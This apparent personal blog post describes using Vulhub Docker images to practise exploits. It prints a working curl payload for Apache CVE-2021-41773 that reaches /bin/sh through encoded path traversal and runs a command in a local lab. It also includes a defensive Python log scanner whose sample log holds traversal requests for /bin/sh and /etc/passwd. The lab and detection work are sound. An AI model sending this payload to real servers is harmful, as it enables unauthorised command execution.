Learning with the Vulhub method
Hey there! I still exist! I finally finished up a monster semester so hopefully I’ll have a bit more time to work on this blog over the summer.
Lately I’ve been wanting to try my hand at creating PoCs for known vulnerabilities. I’ve spent a lot of time working on CTF practice and I will definitely continue to do that, but I found myself wanting to use some of that experience on a real system.
The biggest hurdle for me was setting up an environment that I could test it in. I tried messing around with Docker to check out vulnerable versions of software and build from source, which proved to be a nightmare, and I don’t think I ever once got it to work. I figured there was probably an easier way to set up a system that was innately vulnerable without having to jump through hoops, but I wasn’t sure how to find it.
Enter Vulhub
Recently I discovered a GitHub repo called Vulhub. From my understanding, it is a repo that contains hundreds of Docker images specially configured to be vulnerable to a specific attack. This is exactly what I was looking for! I spent some time perusing the different images and decided to test it out on a vulnerability I was somewhat familiar with.
Using Vulhub (CVE-2021-41773)
I checked to see if Vulhub had the vulnerable image for this CVE, and sure enough it did! To set up, I just had to do
cd vulhub/httpd/CVE-2021-41773/
docker compose up -d
This immediately spun up an Apache web server listening on port 8080. Pretty slick! From there, I simply messed around a bit with the vulnerability. The point of this post isn’t to discuss CVE-2021-41773, but essentially the Apache server had a vulnerability that allowed for path traversal by encoding a ‘.’ character as ‘%2e’. I tested a PoC payload against the running docker image and got:
$ curl --path-as-is -s -X POST "http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh" --data "echo Content-Type: text/plain; echo; id;"
uid=1(daemon) gid=1(daemon) groups=1(daemon)
So there we have it! The docker image was vulnerable to CVE-2021-41773, and this is a valid environment to test it on. This is huge for my learning process and I plan to use it for much more exploration.
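The flip side of having a lab like this is being able to recognise the same request when it shows up in your own logs. The following is an added example, not code from the post or from Vulhub: a small Python scanner that parses Apache access log lines, fully percent-decodes the request path (looping so that double-encoded `%252e` is caught too), and flags any request whose decoded path contains a bare `..` segment. It also records whether the traversal was only visible after decoding, which is the tell for the `%2e` bypass described above. The log lines are constructed for the example; the log format assumed is Apache's default combined format.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines for the example
# (not real traffic; the encoded requests mirror the shape of the PoC above).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jun/2022:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"
10.0.0.5 - - [01/Jun/2022:10:00:02 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 52 "-" "curl/7.68.0"
10.0.0.7 - - [01/Jun/2022:10:00:03 +0000] "GET /icons/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1300 "-" "curl/7.68.0"
10.0.0.9 - - [01/Jun/2022:10:00:04 +0000] "GET /static/%252e%252e/config HTTP/1.1" 404 200 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jun/2022:10:00:05 +0000] "GET /docs/version..2/notes.txt HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Matches the leading fields of an Apache combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def decode_fully(path, max_rounds=3):
    """Percent-decode until the string stops changing, so that double
    encoding (%252e -> %2e -> .) is unwrapped as well. The round cap keeps
    a pathological input from looping forever."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def has_traversal(path):
    """True if any segment of the fully decoded path is a bare '..'.
    Only whole segments count: 'version..2' is not a dot-segment."""
    path = path.split('?', 1)[0]          # ignore the query string
    decoded = decode_fully(path)
    return any(seg == '..' for seg in decoded.split('/'))


def scan_log(text):
    """Return one finding per log line whose request path traverses upward."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group('path')
        if not has_traversal(raw):
            continue
        decoded = decode_fully(raw.split('?', 1)[0])
        findings.append({
            'ip': m.group('ip'),
            'method': m.group('method'),
            'raw': raw,
            'decoded': decoded,
            'status': int(m.group('status')),
            # True when the '..' only appears after decoding: the request relied
            # on encoding to slip past a check that looked for literal '..'.
            'encoded': '..' not in raw,
        })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        flag = 'encoded-traversal' if f['encoded'] else 'plain-traversal'
        print(f"{f['ip']} {f['method']} {f['raw']} -> {f['decoded']} "
              f"[{f['status']}] {flag}")
```

Running it flags the three encoded requests and leaves `/docs/version..2/notes.txt` alone. The `status` field is worth keeping in the output: a 200 on a traversal request is far more interesting than a 404, because it means the server actually resolved the path outside the document root.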
Some considerations
The main drawback for me personally of this method is that Vulhub is mostly focused on web security. There is a lot of great stuff here, but in the future I want to do this kind of thing for memory corruption as well. I have had even more trouble with setting up an environment for PoC testing with memory corruption CVEs, and this still doesn’t quite fix that. I will absolutely be using Vulhub copiously, but I am still looking for something else for my learning process.